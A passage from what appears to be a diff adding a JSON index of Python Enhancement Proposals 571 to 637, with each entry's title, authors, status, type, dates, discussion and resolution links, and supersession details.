"type": "Informational", + "topic": "packaging", + "created": "05-Feb-2018", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/distutils-sig/2018-April/032156.html", + "requires": null, + "replaces": null, + "superseded_by": "600", + "url": "https://peps.python.org/pep-0571/" + }, + "572": { + "number": 572, + "title": "Assignment Expressions", + "authors": "Chris Angelico, Tim Peters, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Feb-2018", + "python_version": "3.8", + "post_history": "28-Feb-2018, 02-Mar-2018, 23-Mar-2018, 04-Apr-2018, 17-Apr-2018, 25-Apr-2018, 09-Jul-2018, 05-Aug-2019", + "resolution": "https://mail.python.org/pipermail/python-dev/2018-July/154601.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0572/" + }, + "573": { + "number": 573, + "title": "Module State Access from C Extension Methods", + "authors": "Petr Viktorin, Alyssa Coghlan, Eric Snow, Marcel Plch", + "discussions_to": "import-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "02-Jun-2016", + "python_version": "3.9", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0573/" + }, + "574": { + "number": 574, + "title": "Pickle protocol 5 with out-of-band data", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "23-Mar-2018", + "python_version": "3.8", + "post_history": "28-Mar-2018, 30-Apr-2019", + "resolution": "https://mail.python.org/pipermail/python-dev/2019-May/157284.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0574/" + 
}, + "575": { + "number": 575, + "title": "Unifying function/method classes", + "authors": "Jeroen Demeyer", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "27-Mar-2018", + "python_version": "3.8", + "post_history": "31-Mar-2018, 12-Apr-2018, 27-Apr-2018, 05-May-2018", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0575/" + }, + "576": { + "number": 576, + "title": "Rationalize Built-in function classes", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "10-May-2018", + "python_version": "3.8", + "post_history": "17-May-2018, 23-Jun-2018, 08-Jul-2018, 29-Mar-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0576/" + }, + "577": { + "number": 577, + "title": "Augmented Assignment Expressions", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "14-May-2018", + "python_version": "3.8", + "post_history": "22-May-2018", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0577/" + }, + "578": { + "number": 578, + "title": "Python Runtime Audit Hooks", + "authors": "Steve Dower", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "16-Jun-2018", + "python_version": "3.8", + "post_history": "28-Mar-2019, 07-May-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0578/" + }, + "579": { + "number": 579, + "title": "Refactoring C functions and methods", + "authors": "Jeroen Demeyer", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "04-Jun-2018", + "python_version": null, + "post_history": "20-Jun-2018", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0579/" + }, + "580": { + "number": 580, + "title": "The C call protocol", + "authors": "Jeroen Demeyer", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "14-Jun-2018", + "python_version": "3.8", + "post_history": "20-Jun-2018, 22-Jun-2018, 16-Jul-2018", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0580/" + }, + "581": { + "number": 581, + "title": "Using GitHub Issues for CPython", + "authors": "Mariatta", + "discussions_to": "https://discuss.python.org/t/535", + "status": "Final", + "type": "Process", + "topic": "", + "created": "20-Jun-2018", + "python_version": null, + "post_history": "07-Mar-2019", + "resolution": "https://mail.python.org/pipermail/python-dev/2019-May/157399.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0581/" + }, + "582": { + "number": 582, + "title": "Python local packages directory", + "authors": "Kushal Das, Steve Dower, Donald Stufft, Alyssa Coghlan", + "discussions_to": "https://discuss.python.org/t/pep-582-python-local-packages-directory/963/", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "16-May-2018", + "python_version": "3.12", + "post_history": "`01-Mar-2019 
`__,", + "resolution": "https://discuss.python.org/t/pep-582-python-local-packages-directory/963/430", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0582/" + }, + "583": { + "number": 583, + "title": "A Concurrency Memory Model for Python", + "authors": "Jeffrey Yasskin", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "22-Mar-2008", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0583/" + }, + "584": { + "number": 584, + "title": "Add Union Operators To dict", + "authors": "Steven D'Aprano, Brandt Bucher", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-Mar-2019", + "python_version": "3.9", + "post_history": "01-Mar-2019, 16-Oct-2019, 02-Dec-2019, 04-Feb-2020, 17-Feb-2020", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/6KT2KIOTYXMDCD2CCAOLOI7LUGTN6MBS", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0584/" + }, + "585": { + "number": 585, + "title": "Type Hinting Generics In Standard Collections", + "authors": "\u0141ukasz Langa", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "03-Mar-2019", + "python_version": "3.9", + "post_history": null, + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/HW2NFOEMCVCTAFLBLC3V7MLM6ZNMKP42/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0585/" + }, + "586": { + "number": 586, + "title": "Literal Types", + "authors": "Michael Lee, Ivan Levkivskyi, Jukka Lehtosalo", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "14-Mar-2019", + "python_version": "3.8", + "post_history": "14-Mar-2019", + "resolution": "https://mail.python.org/archives/list/typing-sig@python.org/message/FDO4KFYWYQEP3U2HVVBEBR3SXPHQSHYR/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0586/" + }, + "587": { + "number": 587, + "title": "Python Initialization Configuration", + "authors": "Victor Stinner, Alyssa Coghlan", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Mar-2019", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0587/" + }, + "588": { + "number": 588, + "title": "GitHub Issues Migration Plan", + "authors": "Mariatta", + "discussions_to": "https://discuss.python.org/t/13791", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "27-Mar-2019", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0588/" + }, + "589": { + "number": 589, + "title": "TypedDict: Type Hints for Dictionaries with a Fixed Set of Keys", + "authors": "Jukka Lehtosalo", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "20-Mar-2019", + "python_version": "3.8", + "post_history": null, + 
"resolution": "https://mail.python.org/archives/list/typing-sig@python.org/message/FDO4KFYWYQEP3U2HVVBEBR3SXPHQSHYR/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0589/" + }, + "590": { + "number": 590, + "title": "Vectorcall: a fast calling protocol for CPython", + "authors": "Mark Shannon, Jeroen Demeyer", + "discussions_to": null, + "status": "Accepted", + "type": "Standards Track", + "topic": "", + "created": "29-Mar-2019", + "python_version": "3.8", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0590/" + }, + "591": { + "number": 591, + "title": "Adding a final qualifier to typing", + "authors": "Michael J. Sullivan, Ivan Levkivskyi", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "15-Mar-2019", + "python_version": "3.8", + "post_history": null, + "resolution": "https://mail.python.org/archives/list/typing-sig@python.org/message/FDO4KFYWYQEP3U2HVVBEBR3SXPHQSHYR/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0591/" + }, + "592": { + "number": 592, + "title": "Adding \"Yank\" Support to the Simple API", + "authors": "Donald Stufft", + "discussions_to": "https://discuss.python.org/t/1629", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "07-May-2019", + "python_version": null, + "post_history": null, + "resolution": "https://discuss.python.org/t/pep-592-support-for-yanked-files-in-the-simple-repository-api/1629/30", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0592/" + }, + "593": { + "number": 593, + "title": "Flexible function and variable annotations", + "authors": "Till Varoquaux, Konstantin Kashin", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "26-Apr-2019", + "python_version": "3.9", + "post_history": "20-May-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0593/" + }, + "594": { + "number": 594, + "title": "Removing dead batteries from the standard library", + "authors": "Christian Heimes, Brett Cannon", + "discussions_to": "https://discuss.python.org/t/13508", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-May-2019", + "python_version": "3.11", + "post_history": "21-May-2019, 04-Feb-2022", + "resolution": "https://discuss.python.org/t/13508/22", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0594/" + }, + "595": { + "number": 595, + "title": "Improving bugs.python.org", + "authors": "Ezio Melotti, Berker Peksag", + "discussions_to": null, + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "12-May-2019", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0595/" + }, + "596": { + "number": 596, + "title": "Python 3.9 Release Schedule", + "authors": "\u0141ukasz Langa", + "discussions_to": "https://discuss.python.org/t/pep-596-python-3-9-release-schedule-doubling-the-release-cadence/1828", + "status": "Active", + "type": "Informational", + "topic": "release", + "created": "04-Jun-2019", + 
"python_version": "3.9", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0596/" + }, + "597": { + "number": 597, + "title": "Add optional EncodingWarning", + "authors": "Inada Naoki", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Jun-2019", + "python_version": "3.10", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0597/" + }, + "598": { + "number": 598, + "title": "Introducing incremental feature releases", + "authors": "Alyssa Coghlan", + "discussions_to": "https://discuss.python.org/t/pep-596-python-3-9-release-schedule-doubling-the-release-cadence/1828", + "status": "Withdrawn", + "type": "Informational", + "topic": "", + "created": "15-Jun-2019", + "python_version": "3.9", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0598/" + }, + "599": { + "number": 599, + "title": "The manylinux2014 Platform Tag", + "authors": "Dustin Ingram", + "discussions_to": "https://discuss.python.org/t/the-next-manylinux-specification/1043", + "status": "Superseded", + "type": "Informational", + "topic": "packaging", + "created": "29-Apr-2019", + "python_version": null, + "post_history": "29-Apr-2019", + "resolution": "https://discuss.python.org/t/the-next-manylinux-specification/1043/199", + "requires": null, + "replaces": null, + "superseded_by": "600", + "url": "https://peps.python.org/pep-0599/" + }, + "600": { + "number": 600, + "title": "Future 'manylinux' Platform Tags for Portable Linux Built Distributions", + "authors": "Nathaniel J. 
Smith, Thomas Kluyver", + "discussions_to": "https://discuss.python.org/t/the-next-manylinux-specification/1043", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "03-May-2019", + "python_version": null, + "post_history": "03-May-2019", + "resolution": "https://discuss.python.org/t/pep-600-future-manylinux-platform-tags-for-portable-linux-built-distributions/2414/27", + "requires": null, + "replaces": "513, 571, 599", + "superseded_by": null, + "url": "https://peps.python.org/pep-0600/" + }, + "601": { + "number": 601, + "title": "Forbid return/break/continue breaking out of finally", + "authors": "Damien George, Batuhan Taskaya", + "discussions_to": "https://discuss.python.org/t/pep-601-forbid-return-break-continue-breaking-out-of-finally/2239", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "26-Aug-2019", + "python_version": "3.8", + "post_history": "26-Aug-2019, 23-Sep-2019", + "resolution": "https://discuss.python.org/t/pep-601-forbid-return-break-continue-breaking-out-of-finally/2239/32", + "requires": null, + "replaces": null, + "superseded_by": "765", + "url": "https://peps.python.org/pep-0601/" + }, + "602": { + "number": 602, + "title": "Annual Release Cycle for Python", + "authors": "\u0141ukasz Langa", + "discussions_to": "https://discuss.python.org/t/pep-602-annual-release-cycle-for-python/2296/", + "status": "Active", + "type": "Process", + "topic": "", + "created": "04-Jun-2019", + "python_version": "3.9", + "post_history": "`09-Oct-2023 `__", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/KE7OS4PZASZMFTW2FP2MWZU5R4Q2QZKU/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0602/" + }, + "603": { + "number": 603, + "title": "Adding a frozenmap type to collections", + "authors": "Yury Selivanov", + "discussions_to": "https://discuss.python.org/t/pep-603-adding-a-frozenmap-type-to-collections/2318/", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "12-Sep-2019", + "python_version": null, + "post_history": "12-Sep-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0603/" + }, + "604": { + "number": 604, + "title": "Allow writing union types as ``X | Y``", + "authors": "Philippe PRADOS, Maggie Moss", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "28-Aug-2019", + "python_version": "3.10", + "post_history": "28-Aug-2019, 05-Aug-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0604/" + }, + "605": { + "number": 605, + "title": "A rolling feature release stream for CPython", + "authors": "Steve Dower, Alyssa Coghlan", + "discussions_to": "https://discuss.python.org/t/pep-605-a-rolling-feature-release-stream-for-cpython/2418", + "status": "Rejected", + "type": "Informational", + "topic": "", + "created": "20-Sep-2019", + "python_version": "3.9", + "post_history": "01-Oct-2019, 06-Oct-2019, 20-Oct-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0605/" + }, + "606": { + "number": 606, + "title": "Python Compatibility Version", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": 
"18-Oct-2019", + "python_version": "3.9", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0606/" + }, + "607": { + "number": 607, + "title": "Reducing CPython's Feature Delivery Latency", + "authors": "\u0141ukasz Langa, Steve Dower, Alyssa Coghlan", + "discussions_to": "https://discuss.python.org/t/pep-607-shared-background-for-the-release-cadence-peps/2528", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "11-Oct-2019", + "python_version": "3.9", + "post_history": "20-Oct-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0607/" + }, + "608": { + "number": 608, + "title": "Coordinated Python release", + "authors": "Miro Hron\u010dok, Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "25-Oct-2019", + "python_version": "3.9", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0608/" + }, + "609": { + "number": 609, + "title": "Python Packaging Authority (PyPA) Governance", + "authors": "Dustin Ingram, Pradyun Gedam, Sumana Harihareswara", + "discussions_to": "https://discuss.python.org/t/pep-609-pypa-governance/2619", + "status": "Active", + "type": "Process", + "topic": "governance, packaging", + "created": "05-Nov-2019", + "python_version": null, + "post_history": "05-Nov-2019", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0609/" + }, + "610": { + "number": 610, + "title": "Recording the Direct URL Origin of installed distributions", + "authors": "St\u00e9phane Bidoul, Chris Jerdonek", + "discussions_to": "https://discuss.python.org/t/recording-the-source-url-of-an-installed-distribution/1535", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "21-Apr-2019", + "python_version": null, + "post_history": null, + "resolution": "https://discuss.python.org/t/1535/56", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0610/" + }, + "611": { + "number": 611, + "title": "The one million limit", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "05-Dec-2019", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0611/" + }, + "612": { + "number": 612, + "title": "Parameter Specification Variables", + "authors": "Mark Mendoza", + "discussions_to": "typing-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "18-Dec-2019", + "python_version": "3.10", + "post_history": "18-Dec-2019, 13-Jul-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0612/" + }, + "613": { + "number": 613, + "title": "Explicit Type Aliases", + "authors": "Shannon Zhu", + "discussions_to": "https://mail.python.org/archives/list/typing-sig@python.org/thread/MWRJOBEEEMFVXE7CAKO7B4P46IPM4AN3/", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "21-Jan-2020", + "python_version": "3.10", + "post_history": "21-Jan-2020", + 
"resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0613/" + }, + "614": { + "number": 614, + "title": "Relaxing Grammar Restrictions On Decorators", + "authors": "Brandt Bucher", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-Feb-2020", + "python_version": "3.9", + "post_history": "11-Feb-2020, 18-Feb-2020, 03-Mar-2020", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/VSR66MOTCDCY7ZFH4IG7QVFI2JXQQZQ5", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0614/" + }, + "615": { + "number": 615, + "title": "Support for the IANA Time Zone Database in the Standard Library", + "authors": "Paul Ganssle", + "discussions_to": "https://discuss.python.org/t/3468", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-Feb-2020", + "python_version": "3.9", + "post_history": "25-Feb-2020, 29-Mar-2020", + "resolution": null, + "requires": null, + "replaces": "431", + "superseded_by": null, + "url": "https://peps.python.org/pep-0615/" + }, + "616": { + "number": 616, + "title": "String methods to remove prefixes and suffixes", + "authors": "Dennis Sweeney", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "19-Mar-2020", + "python_version": "3.9", + "post_history": "20-Mar-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0616/" + }, + "617": { + "number": 617, + "title": "New PEG parser for CPython", + "authors": "Guido van Rossum, Pablo Galindo, Lysandros Nikolaou", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "24-Mar-2020", + "python_version": "3.9", + "post_history": "02-Apr-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0617/" + }, + "618": { + "number": 618, + "title": "Add Optional Length-Checking To zip", + "authors": "Brandt Bucher", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-May-2020", + "python_version": "3.10", + "post_history": "01-May-2020, 10-May-2020, 16-Jun-2020", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/NLWB7FVJGMBBMCF4P3ZKUIE53JPDOWJ3", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0618/" + }, + "619": { + "number": 619, + "title": "Python 3.10 Release Schedule", + "authors": "Pablo Galindo Salgado", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "release", + "created": "25-May-2020", + "python_version": "3.10", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0619/" + }, + "620": { + "number": 620, + "title": "Hide implementation details from the C API", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "19-Jun-2020", + "python_version": "3.12", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0620/" + }, + "621": { + "number": 621, + "title": "Storing project 
metadata in pyproject.toml", + "authors": "Brett Cannon, Dustin Ingram, Paul Ganssle, Pradyun Gedam, S\u00e9bastien Eustace, Thomas Kluyver, Tzu-ping Chung", + "discussions_to": "https://discuss.python.org/t/pep-621-round-3/5472", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "22-Jun-2020", + "python_version": null, + "post_history": "22-Jun-2020, 18-Oct-2020, 24-Oct-2020, 31-Oct-2020", + "resolution": "https://discuss.python.org/t/pep-621-round-3/5472/109", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0621/" + }, + "622": { + "number": 622, + "title": "Structural Pattern Matching", + "authors": "Brandt Bucher, Daniel F Moisset, Tobias Kohn, Ivan Levkivskyi, Guido van Rossum, Talin", + "discussions_to": "python-dev@python.org", + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "23-Jun-2020", + "python_version": "3.10", + "post_history": "23-Jun-2020, 08-Jul-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "634", + "url": "https://peps.python.org/pep-0622/" + }, + "623": { + "number": 623, + "title": "Remove wstr from Unicode", + "authors": "Inada Naoki", + "discussions_to": "https://mail.python.org/archives/list/python-dev@python.org/thread/BO2TQHSXWL2RJMINWQQRBF5LANDDJNHH/", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "25-Jun-2020", + "python_version": "3.10", + "post_history": null, + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/VQKDIZLZ6HF2MLTNCUFURK2IFTXVQEYA/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0623/" + }, + "624": { + "number": 624, + "title": "Remove Py_UNICODE encoder APIs", + "authors": "Inada Naoki", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "06-Jul-2020", + "python_version": "3.11", + "post_history": "08-Jul-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0624/" + }, + "625": { + "number": 625, + "title": "Filename of a Source Distribution", + "authors": "Tzu-ping Chung, Paul Moore", + "discussions_to": "https://discuss.python.org/t/draft-pep-file-name-of-a-source-distribution/4686", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "08-Jul-2020", + "python_version": null, + "post_history": "08-Jul-2020", + "resolution": "https://discuss.python.org/t/pep-625-file-name-of-a-source-distribution/4686/159", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0625/" + }, + "626": { + "number": 626, + "title": "Precise line numbers for debugging and other tools.", + "authors": "Mark Shannon", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Jul-2020", + "python_version": "3.10", + "post_history": "17-Jul-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0626/" + }, + "627": { + "number": 627, + "title": "Recording installed projects", + "authors": "Petr Viktorin", + "discussions_to": "https://discuss.python.org/t/pep-627/4126", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "15-Jul-2020", + "python_version": null, + "post_history": null, + "resolution": 
"https://discuss.python.org/t/pep-627/4126/42", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0627/" + }, + "628": { + "number": 628, + "title": "Add ``math.tau``", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Jun-2011", + "python_version": "3.6", + "post_history": "28-Jun-2011", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0628/" + }, + "629": { + "number": 629, + "title": "Versioning PyPI's Simple API", + "authors": "Donald Stufft", + "discussions_to": "https://discuss.python.org/t/pep-629-versioning-pypis-simple-api/4720", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "16-Jul-2020", + "python_version": null, + "post_history": "16-Jul-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0629/" + }, + "630": { + "number": 630, + "title": "Isolating Extension Modules", + "authors": "Petr Viktorin", + "discussions_to": "capi-sig@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "25-Aug-2020", + "python_version": null, + "post_history": "16-Jul-2020", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0630/" + }, + "631": { + "number": 631, + "title": "Dependency specification in pyproject.toml based on PEP 508", + "authors": "Ofek Lev", + "discussions_to": "https://discuss.python.org/t/5018", + "status": "Superseded", + "type": "Standards Track", + "topic": "packaging", + "created": "20-Aug-2020", + "python_version": null, + "post_history": "20-Aug-2020", + "resolution": "https://discuss.python.org/t/how-to-specify-dependencies-pep-508-strings-or-a-table-in-toml/5243/38", + "requires": null, + "replaces": null, + "superseded_by": "621", + "url": "https://peps.python.org/pep-0631/" + }, + "632": { + "number": 632, + "title": "Deprecate distutils module", + "authors": "Steve Dower", + "discussions_to": "https://discuss.python.org/t/pep-632-deprecate-distutils-module/5134", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "03-Sep-2020", + "python_version": "3.10", + "post_history": "03-Sep-2020, 22-Jan-2021", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/TXU6TVOMBLQU3SV57DMMOA5Y2E67AW7P/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0632/" + }, + "633": { + "number": 633, + "title": "Dependency specification in pyproject.toml using an exploded TOML table", + "authors": "Laurie Opperman, Arun Babu Neelicattu", + "discussions_to": "https://discuss.python.org/t/dependency-specification-in-pyproject-toml-using-an-exploded-toml-table/5123/", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "02-Sep-2020", + "python_version": null, + "post_history": "02-Sep-2020", + "resolution": "https://discuss.python.org/t/how-to-specify-dependencies-pep-508-strings-or-a-table-in-toml/5243/38", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0633/" + }, + "634": { + "number": 634, + "title": "Structural Pattern Matching: Specification", + "authors": "Brandt Bucher, Guido van Rossum", + "discussions_to": "python-dev@python.org", + "status": 
"Final", + "type": "Standards Track", + "topic": "", + "created": "12-Sep-2020", + "python_version": "3.10", + "post_history": "22-Oct-2020, 08-Feb-2021", + "resolution": "https://mail.python.org/archives/list/python-committers@python.org/message/SQC2FTLFV5A7DV7RCEAR2I2IKJKGK7W3", + "requires": null, + "replaces": "622", + "superseded_by": null, + "url": "https://peps.python.org/pep-0634/" + }, + "635": { + "number": 635, + "title": "Structural Pattern Matching: Motivation and Rationale", + "authors": "Tobias Kohn, Guido van Rossum", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "12-Sep-2020", + "python_version": "3.10", + "post_history": "22-Oct-2020, 08-Feb-2021", + "resolution": "https://mail.python.org/archives/list/python-committers@python.org/message/SQC2FTLFV5A7DV7RCEAR2I2IKJKGK7W3", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0635/" + }, + "636": { + "number": 636, + "title": "Structural Pattern Matching: Tutorial", + "authors": "Daniel F Moisset", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "12-Sep-2020", + "python_version": "3.10", + "post_history": "22-Oct-2020, 08-Feb-2021", + "resolution": "https://mail.python.org/archives/list/python-committers@python.org/message/SQC2FTLFV5A7DV7RCEAR2I2IKJKGK7W3", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0636/" + }, + "637": { + "number": 637, + "title": "Support for indexing with keyword arguments", + "authors": "Stefano Borini", + "discussions_to": "python-ideas@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "24-Aug-2020", + "python_version": "3.10", + "post_history": "23-Sep-2020", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/thread/6TAQ2BEVSJNV4JM2RJYSSYFJUT3INGZD/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0637/" + }, + "638": { + "number": 638, + "title": "Syntactic 